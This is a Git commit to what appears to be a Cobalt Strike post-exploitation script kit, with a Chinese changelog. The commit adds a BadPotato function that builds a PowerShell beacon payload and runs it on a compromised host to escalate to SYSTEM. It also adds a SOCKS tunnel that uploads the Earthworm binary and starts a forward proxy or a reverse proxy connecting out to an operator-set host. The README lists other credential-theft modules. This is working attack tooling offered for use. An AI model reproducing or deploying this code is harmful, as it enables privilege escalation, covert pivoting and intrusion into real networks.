add socks tunnel

DeEpinGh0st · Oct 19, 2020 · c470028 · c470028
1 parent 63b980d
commit c470028
Show file tree

Hide file tree

Showing 9 changed files with 64 additions and 10 deletions.
diff --git a/Main.cna b/Main.cna
@@ -2,7 +2,7 @@
 action("\cB Loading initial scripts.....");
 include(script_resource("Common.sl"));
 include(script_resource("modules/commands.cna"));
-action("\c9 Loaded commands: safetykatz,seatbelt,hivejack,logonscreen");
+action("\c9 Loaded commands: safetykatz,seatbelt,hivejack,logonscreen,badcmd");
 include(script_resource("modules/auxiliary.cna"));
 include(script_resource("third/rdpthief/RdpThief.cna"));
 action("\c9 Loaded command: rdpthief");

diff --git a/README.md b/README.md
@@ -4,6 +4,14 @@
 **由于异步处理问题，某些功能可能会存在BUG**  
 **暂时未找到解决方法，如果大佬们有解决方案，欢迎联系我~**  
 
+
+##  更新日志 2020-10-19(V1.3.5)  
+- 添加badcmd命令(基于badpotato)  
+- potatos提权添加badpotato  
+- post模块添加socks功能(基于ew)  
+	>详见post---->Socks tunnel  
+	![输入图片描述](README_md_files/20201019154454.png?v=1&type=image)  
+- **删除信息收集模块审计功能**  
 ## 更新日志 2020-07-31(V1.3.4)
 - 添加fakelogonscreen命令  
 - 添加SpaceRunner  

diff --git a/README_md_files/20201019154454.png b/README_md_files/20201019154454.png
diff --git a/README_md_files/image.png b/README_md_files/image.png
diff --git a/modules/lpe.cna b/modules/lpe.cna
@@ -3,17 +3,11 @@
 
 sub RunJuicyPotato{
     btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via JuicyPotato");
-    local('$payload $handle $call $port $id $fname $total');
-    @array = @("a", "b", "c", "d", "e", "f", "g", "1", "2", "3", "4", "5", "6");
-    $total = 8;
+    local('$payload $handle $call $port $id $fname');
     $call = $3['Call'];
     $port = $3['Port'];
     $id = $3['CLSID'];
-    while($total >= 0){
-        $fname = $fname.rand(@array);
-        $total = $total - 1;
-    }
-    $fname = $fname.".cmd";
+    $fname = Getname().".cmd";
     if ($call eq "CreateProcessWithTokenW"){
         $call = "t";
     }
@@ -41,6 +35,18 @@ sub RunJuicyPotato{
     exec("cmd.exe /C del /F ".$fname);
 }
 
+sub BadPotato{
+    btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via BadPotato");
+    local('$payload $handle $fname');
+    $fname = Getname().".cmd";
+    $payload = powershell($3['listener'], false);
+    $handle = openf("> $+ $fname");
+    writeb($handle, $payload);
+    closef($handle);
+    bupload!($bid, $fname);
+    bexecute_assembly($bid, script_resource("post/BadPotato.exe"), $fname);
+}
+
 sub CVE_2018_8120{
     btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via CVE-2018-8120");
     local('$Rch $payload');
@@ -178,6 +184,14 @@ sub cve_2019_0803{
                 dbutton_action($Dialog, "Exploit");
                 dialog_show($Dialog);
             }
+            item "Bad-Potato"{
+                $bid = $1['@'];
+                $Dialog = dialog("Bad Potato",%(bid => $bid),&BadPotato);
+                dialog_description($Dialog, "The vulnerability could allow elevation of privilege.");
+                drow_listener($Dialog, "listener", "Listener: ");
+                dbutton_action($Dialog, "Exploit");
+                dialog_show($Dialog);
+            }
 
 
         }

diff --git a/modules/post.cna b/modules/post.cna
@@ -85,6 +85,26 @@ sub Migrate{
     bshell!($bid,$cmd);
     btask($bid, "migrating process location to ".$dir.$process.", please wait new session !", "");
 }
+sub Socks{
+    local('$type $lport $refhost $refport $rch');
+    $type = $3['type'];
+    $lport = $3['listenport'];
+    $refhost = $3['refhost'];
+    $refport = $3['refport'];
+    $rch = "x86";
+    if (beacon_info($bid,"is64") == 1){
+        $rch = "x64";
+    }
+    bupload!($bid, script_resource("post/ew/ $+ $rch $+ .exe"));
+    if($type eq "Forward"){
+        bshell!($bid, $rch.".exe -s ssocksd -l ".$lport);
+        btask($bid, "Started socks5 server at: ".beacon_info($bid, "external").":".$lport);
+    }
+    else{
+        bshell!($bid, $rch.".exe -s rssocks -d ".$refhost." -e ".$refport);
+        btask($bid, "Started socks5 server at: ".$refhost.":".$refport);
+    }
+}
 #append menus
 
 
@@ -160,4 +180,16 @@ sub Migrate{
                 dbutton_action($dialog, "Exec");
                 dialog_show($dialog);
             }
+
+            item "Socks tunnel"{
+                $bid = $1['@'];
+                $dialog = dialog("Create socks server",%(bid => $bid, listenport => "1080", refhost => "1.1.1.1", refport => "8888"), &Socks);
+                dialog_description($dialog,"Create a forward or reverse socks5 server use Earthworm.");
+                drow_combobox($dialog, "type", "Type: ", @("Forward", "Reverse"));
+                drow_text($dialog, "listenport", "Listen port(-l): ", "");
+                drow_text($dialog, "refhost", "Reflection host address(-d): ", "");
+                drow_text($dialog, "refport", "Reflection port(-e): ", "");
+                dbutton_action($dialog, "Exec");
+                dialog_show($dialog);
+            }
     }
diff --git a/post/ew/x32.exe b/post/ew/x32.exe
diff --git a/post/ew/x64.exe b/post/ew/x64.exe
diff --git a/setting.txt b/setting.txt
@@ -1,2 +1,2 @@
-ver = 1.3.4
+ver = 1.3.5
 dir = C:\Services\